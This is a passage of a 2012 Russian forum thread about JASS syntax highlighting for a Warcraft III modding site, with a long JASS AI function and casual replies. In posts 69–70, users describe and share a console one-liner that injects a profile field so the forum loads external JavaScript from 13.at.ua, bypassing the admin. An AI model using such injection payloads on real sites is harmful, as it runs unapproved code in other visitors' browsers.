[jass][/jass]
|
|
|
|
Ty3uK | Дата: Суббота, 07 Января 2012, 15:20:11 | Сообщение # 51 |
Группа: Ветераны
Сообщений: 6125
Награды: 2
Репутация: 1617
Блокировки:
| Ну все, раз все авторские права соблюдены, то думаю все в порядке
|
|
|
|
Betmenok | Дата: Суббота, 07 Января 2012, 16:18:50 | Сообщение # 52 |
3 уровень
Группа: Заблокированные
Сообщений: 67
Награды: 0
Репутация: -33
Блокировки:
| [DUОS], Нужен,но http://warcraft3ft.info/ ходит в хостинг юкоз,в юкозе можно только ББ коды и HTML коды [jass] и [/jass] - очень сложно настроить
|
|
|
|
Ty3uK | Дата: Суббота, 07 Января 2012, 16:42:50 | Сообщение # 53 |
Группа: Ветераны
Сообщений: 6125
Награды: 2
Репутация: 1617
Блокировки:
| $(this).html(replace) решает, бро Добавлено (07 Январь 2012, 16:42:50) --------------------------------------------- Ну точнее сначала берем элемент, офк
|
|
|
|
Dimon4iK-ERA | Дата: Суббота, 07 Января 2012, 20:58:16 | Сообщение # 54 |
9 уровень
Группа: Проверенные
Сообщений: 1046
Награды: 0
Репутация: 397
Блокировки:
| [DUОS], о, спасибо за код Пригодиться. А вообще это отличная штука для сайтов по вару. Стоит ставить даже не задумываясь.
|
|
|
|
[DUОS] | Дата: Суббота, 07 Января 2012, 21:38:39 | Сообщение # 55 |
Группа: Заблокированные
Сообщений: 6279
Награды: 9
Репутация: 1708
Блокировки:
| Dimon4iK-ERA, Какбе большую часть работы Тузик сделал, ему спасибо скажи.
|
|
|
|
kshlkv | Дата: Суббота, 07 Января 2012, 21:44:48 | Сообщение # 56 |
3 уровень
Группа: Проверенные
Сообщений: 57
Награды: 0
Репутация: 14
Блокировки:
| [DUОS], Я за. На некоторых сайтах о юкоз есть такая штука. Удобно))
|
|
|
|
lawson | Дата: Суббота, 07 Января 2012, 22:58:56 | Сообщение # 57 |
Группа: Проверенные
Сообщений: 3482
Награды: 0
Репутация: 974
Блокировки:
| Quote (kshlkv) На некоторых сайтах о юкоз есть такая штука. Удобно)) Человек понятия не имеет о чем идет речь.
Nic nie wiem bo mam chuj. редактирую посты! ВСЕ!
|
|
|
|
SirNikolas | Дата: Воскресенье, 08 Января 2012, 11:26:08 | Сообщение # 58 |
Группа: Модераторы
Сообщений: 6729
Награды: 1
Репутация: 1867
Блокировки:
| lawson, главное, что он за.
|
|
|
|
Dreii | Дата: Воскресенье, 08 Января 2012, 14:33:56 | Сообщение # 59 |
10 уровень
Группа: Проверенные
Сообщений: 4991
Награды: 0
Репутация: 603
Блокировки:
| Нужен обязательно
|
|
|
|
kshlkv | Дата: Воскресенье, 08 Января 2012, 20:50:40 | Сообщение # 60 |
3 уровень
Группа: Проверенные
Сообщений: 57
Награды: 0
Репутация: 14
Блокировки:
| Quote (lawson) Человек понятия не имеет о чем идет речь. Понимаю. Не волнуйся. Я говорю, что подсветка синтаксиса это удобно. И привел в пример JS подсветку.
|
|
|
|
wetalq | Дата: Вторник, 10 Января 2012, 18:34:01 | Сообщение # 61 |
8 уровень
Группа: Проверенные
Сообщений: 550
Награды: 0
Репутация: 117
Блокировки:
| k0fe1n, вот для гуишников)
|
|
|
|
Mep3aB4uK | Дата: Понедельник, 06 Февраля 2012, 19:48:44 | Сообщение # 62 |
9 уровень
Группа: Проверенные
Сообщений: 1019
Награды: 0
Репутация: 135
Блокировки:
| [jass]function SetBuyTaskz takes integer lIDz, unit ushopz, integer ltaskz returns nothing local integer lAz local unit uPeonz local real rMinz local real rAz local group gAz local unit uAz set rAz = 1 if EnemyCountInRangez(GetUnitX(ushopz),GetUnitY(ushopz),800.0) > 1 then if GetFloatGameState(GAME_STATE_TIME_OF_DAY) < 18 or lNearUnsleeppedz > 0 then set rAz = 0 endif endif set lAz = 1 loop exitwhen lAz > lCountTaskz if Tasksz[lAz] == ltaskz then set rAz = 0 elseif Tasksz[lAz] == 5 then set rAz = 0 endif set lAz = lAz + 1 endloop if rAz == 0 then return endif if cntHippos_donez > 0 then set lAz = HIPPOZ elseif cntChimaeras_donez > 0 then set lAz = CHIMAERAZ else set lAz = 0 endif set uPeonz = null if lAz != 0 then set rMinz = -1 set gAz = CreateGroup() call GroupEnumUnitsOfPlayer(gAz,AIPlayerz,null) loop set uAz = FirstOfGroup(gAz) exitwhen uAz == null set rAz = UnitsDistanceSz(ushopz,uAz) if GetUnitTypeId(uAz) == lAz and GetUnitState(uAz, UNIT_STATE_LIFE) > 0.0 then if not IsUnitHasTaskz(uAz) then if rAz < rMinz or rMinz == -1 then set rMinz = rAz set uPeonz = uAz endif endif endif if rAz < 90000 then if IssueNeutralImmediateOrderById(AIPlayerz, ushopz, lIDz) then set cntGoldz = GetPlayerState(AIPlayerz,PLAYER_STATE_RESOURCE_GOLD) set cntWoodz = GetPlayerState(AIPlayerz,PLAYER_STATE_RESOURCE_LUMBER) set cntFoodUsedz = GetPlayerState(AIPlayerz,PLAYER_STATE_RESOURCE_FOOD_USED) set lAz = 0 loop exitwhen lAz > lNeutralBuildingsz if ushopz == NeutralBuildingsz[lAz] then set NBReadyTimesz[lAz] = lTimez + 510 endif set lAz = lAz + 1 endloop call DestroyGroup(gAz) set gAz = null return endif endif call GroupRemoveUnit(gAz,uAz) endloop call DestroyGroup(gAz) set gAz = null endif if uPeonz != null then if uPeonz == uReconnoitUnitz then set uReconnoitUnitz = null endif set lReservedGoldz = lReservedGoldz + GetUnitGoldCost(lIDz) set lReservedWoodz = lReservedWoodz + GetUnitWoodCost(lIDz) set lReservedFoodz = lReservedFoodz + GetFoodUsed(lIDz) call IssuePointOrder(uPeonz, "move", GetUnitX(ushopz),GetUnitY(ushopz)) set lCountTaskz = lCountTaskz + 1 set TasksUnitsz[lCountTaskz] = uPeonz set PeonsOldXz[lCountTaskz] = GetUnitX(uPeonz) set PeonsOldYz[lCountTaskz] = GetUnitY(uPeonz) set TasksDestXz[lCountTaskz] = GetUnitX(ushopz) set TasksDestYz[lCountTaskz] = GetUnitY(ushopz) set Tasksz[lCountTaskz] = ltaskz set TasksWhatBuildz[lCountTaskz] = lIDz set TasksStatesz[lCountTaskz] = 1 set TasksRepetitionsz[lCountTaskz] = 0 call RemoveGuardPosition(uPeonz) endif endfunction //---------------------------- [/jass]
Сообщение отредактировал Mep3aB4uK - Понедельник, 06 Февраля 2012, 21:29:46 |
|
|
|
MOPnEX | Дата: Понедельник, 06 Февраля 2012, 21:32:22 | Сообщение # 63 |
4 уровень
Группа: Проверенные
Сообщений: 98
Награды: 0
Репутация: 23
Блокировки:
| Code function SetBuyTaskz takes integer lIDz, unit ushopz, integer ltaskz returns nothing local integer lAz local unit uPeonz local real rMinz local real rAz local group gAz local unit uAz set rAz = 1 if EnemyCountInRangez(GetUnitX(ushopz),GetUnitY(ushopz),800.0) > 1 then if GetFloatGameState(GAME_STATE_TIME_OF_DAY) < 18 or lNearUnsleeppedz > 0 then set rAz = 0 endif endif set lAz = 1 loop exitwhen lAz > lCountTaskz if Tasksz[lAz] == ltaskz then set rAz = 0 elseif Tasksz[lAz] == 5 then set rAz = 0 endif set lAz = lAz + 1 endloop if rAz == 0 then return endif if cntHippos_donez > 0 then set lAz = HIPPOZ elseif cntChimaeras_donez > 0 then set lAz = CHIMAERAZ else set lAz = 0 endif set uPeonz = null if lAz != 0 then set rMinz = -1 set gAz = CreateGroup() call GroupEnumUnitsOfPlayer(gAz,AIPlayerz,null) loop set uAz = FirstOfGroup(gAz) exitwhen uAz == null set rAz = UnitsDistanceSz(ushopz,uAz) if GetUnitTypeId(uAz) == lAz and GetUnitState(uAz, UNIT_STATE_LIFE) > 0.0 then if not IsUnitHasTaskz(uAz) then if rAz < rMinz or rMinz == -1 then set rMinz = rAz set uPeonz = uAz endif endif endif if rAz < 90000 then if IssueNeutralImmediateOrderById(AIPlayerz, ushopz, lIDz) then set cntGoldz = GetPlayerState(AIPlayerz,PLAYER_STATE_RESOURCE_GOLD) set cntWoodz = GetPlayerState(AIPlayerz,PLAYER_STATE_RESOURCE_LUMBER) set cntFoodUsedz = GetPlayerState(AIPlayerz,PLAYER_STATE_RESOURCE_FOOD_USED) set lAz = 0 loop exitwhen lAz > lNeutralBuildingsz if ushopz == NeutralBuildingsz[lAz] then set NBReadyTimesz[lAz] = lTimez + 510 endif set lAz = lAz + 1 endloop call DestroyGroup(gAz) set gAz = null return endif endif call GroupRemoveUnit(gAz,uAz) endloop call DestroyGroup(gAz) set gAz = null endif if uPeonz != null then if uPeonz == uReconnoitUnitz then set uReconnoitUnitz = null endif set lReservedGoldz = lReservedGoldz + GetUnitGoldCost(lIDz) set lReservedWoodz = lReservedWoodz + GetUnitWoodCost(lIDz) set lReservedFoodz = lReservedFoodz + GetFoodUsed(lIDz) call IssuePointOrder(uPeonz, "move", GetUnitX(ushopz),GetUnitY(ushopz)) set lCountTaskz = lCountTaskz + 1 set TasksUnitsz[lCountTaskz] = uPeonz set PeonsOldXz[lCountTaskz] = GetUnitX(uPeonz) set PeonsOldYz[lCountTaskz] = GetUnitY(uPeonz) set TasksDestXz[lCountTaskz] = GetUnitX(ushopz) set TasksDestYz[lCountTaskz] = GetUnitY(ushopz) set Tasksz[lCountTaskz] = ltaskz set TasksWhatBuildz[lCountTaskz] = lIDz set TasksStatesz[lCountTaskz] = 1 set TasksRepetitionsz[lCountTaskz] = 0 call RemoveGuardPosition(uPeonz) endif endfunction //----------------------------
|
|
|
|
IIAXAH | Дата: Понедельник, 06 Февраля 2012, 21:45:56 | Сообщение # 64 |
3 уровень
Группа: Проверенные
Сообщений: 72
Награды: 0
Репутация: 26
Блокировки:
| Реализовано на Инфо в обход админа. Просто клик На в моем посте.
|
|
|
|
oleg_best_oleg | Дата: Понедельник, 06 Февраля 2012, 21:51:55 | Сообщение # 65 |
Группа: Заблокированные
Сообщений: 1726
Награды: 0
Репутация: 654
Блокировки:
| IIAXAH, реально работает, но на всякий, сменю-ка я пароль)
|
|
|
|
IIAXAH | Дата: Понедельник, 06 Февраля 2012, 21:53:44 | Сообщение # 66 |
3 уровень
Группа: Проверенные
Сообщений: 72
Награды: 0
Репутация: 26
Блокировки:
| Я не против.
|
|
|
|
[DUОS] | Дата: Понедельник, 06 Февраля 2012, 22:04:46 | Сообщение # 67 |
Группа: Заблокированные
Сообщений: 6279
Награды: 9
Репутация: 1708
Блокировки:
| Quote (IIAXAH) Реализовано на Инфо в обход админа. Просто клик На в моем посте. Игры с укозом делают тебя несколько гением.
|
|
|
|
IIAXAH | Дата: Понедельник, 06 Февраля 2012, 22:16:36 | Сообщение # 68 |
3 уровень
Группа: Проверенные
Сообщений: 72
Награды: 0
Репутация: 26
Блокировки:
| В интернетах побеждает не тот, у кого профиль с большими правами, а тот кто грамотнее. Твержу уже 3 года, и не помню чтобы кто-то соглашался.
|
|
|
|
Brut@lus | Дата: Понедельник, 06 Февраля 2012, 23:42:44 | Сообщение # 69 |
Группа: Заблокированные
Сообщений: 2496
Награды: 1
Репутация: 924
Блокировки:
| IIAXAH, Как это сделать самому ссылкой?
Добавлено (06 Февраль 2012, 23:42:44) --------------------------------------------- Типа Code {code}function func takes integer{/code} [url=http://13.at.ua/a.js]go jass[/url]
Сообщение отредактировал Brut@lus - Понедельник, 06 Февраля 2012, 23:43:09 |
|
|
|
IIAXAH | Дата: Вторник, 07 Февраля 2012, 11:39:03 | Сообщение # 70 |
3 уровень
Группа: Проверенные
Сообщений: 72
Награды: 0
Репутация: 26
Блокировки:
| А я не знаю. При нежелании админа и администрации только через задний проход получилось сделать.Добавлено (07 Февраль 2012, 00:04:10) --------------------------------------------- Ups! А может ты не знаешь как сделать кнопку WWW? Добавлено (07 Февраль 2012, 00:22:05) --------------------------------------------- Если кто не знает, то это совсем просто: Через Firefox заходим в Изменение личной информации. Жмем Shift+F4 вставляем туда Code document.getElementById('siM7').innerHTML='<input type="hidden" name="home_page" value="a.do.am\').close();includeJSfile(\'http://13.at.ua/a.js\',\'"/>ICQ номер:'; Жмем Выполнить Введим код подтверждения и сохраняем свои данные. Предупреждение: у меня очень плохая репутация.Добавлено (07 Февраль 2012, 11:39:03) --------------------------------------------- Вот она, подсветка, есть, - а нажать нельзя - страашна.
|
|
|
|
SirNikolas | Дата: Вторник, 07 Февраля 2012, 12:52:31 | Сообщение # 71 |
Группа: Модераторы
Сообщений: 6729
Награды: 1
Репутация: 1867
Блокировки:
| Вышел из профиля, закрыл браузер, открыл IE, щелкнул. И правда, работает.
|
|
|
|
Ty3uK | Дата: Вторник, 07 Февраля 2012, 18:09:03 | Сообщение # 72 |
Группа: Ветераны
Сообщений: 6125
Награды: 2
Репутация: 1617
Блокировки:
| Цвета правда слегка непривычные после jngp. Но это мелочь Добавлено (07 Февраль 2012, 18:09:03) --------------------------------------------- Только вот вопрос- твои отступы присутствуют визуально, но при копировании текста из подсветки в редактор они исчезнут и код станет сплошным
|
|
|
|
IIAXAH | Дата: Вторник, 07 Февраля 2012, 18:55:46 | Сообщение # 73 |
3 уровень
Группа: Проверенные
Сообщений: 72
Награды: 0
Репутация: 26
Блокировки:
| Исправлено.
|
|
|
|
Ty3uK | Дата: Вторник, 07 Февраля 2012, 20:29:09 | Сообщение # 74 |
Группа: Ветераны
Сообщений: 6125
Награды: 2
Репутация: 1617
Блокировки:
| Молодец
|
|
|
|
IIAXAH | Дата: Понедельник, 09 Апреля 2012, 21:49:01 | Сообщение # 75 |
3 уровень
Группа: Проверенные
Сообщений: 72
Награды: 0
Репутация: 26
Блокировки:
| Период пробного пользования истек.
|
|
|
|